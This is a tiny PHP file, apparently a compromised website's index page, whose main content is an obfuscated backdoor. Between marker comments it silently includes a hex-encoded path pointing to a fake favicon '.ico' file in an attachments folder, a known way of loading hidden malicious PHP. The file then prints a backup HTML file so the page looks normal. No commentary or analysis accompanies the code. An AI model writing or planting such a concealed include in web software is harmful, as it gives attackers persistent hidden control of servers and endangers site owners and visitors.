<?php

/*27e20*/

@include "\x2fv\x61r\x2fw\x77w\x2fh\x74m\x6c/\x61j\x70t\x73t\x2fa\x74t\x61c\x68m\x65n\x74s\x2f0\x2ff\x61v\x69c\x6fn\x5f4\x63a\x38b\x64.\x69c\x6f";

/*27e20*/


echo file_get_contents('index.html.bak.bak');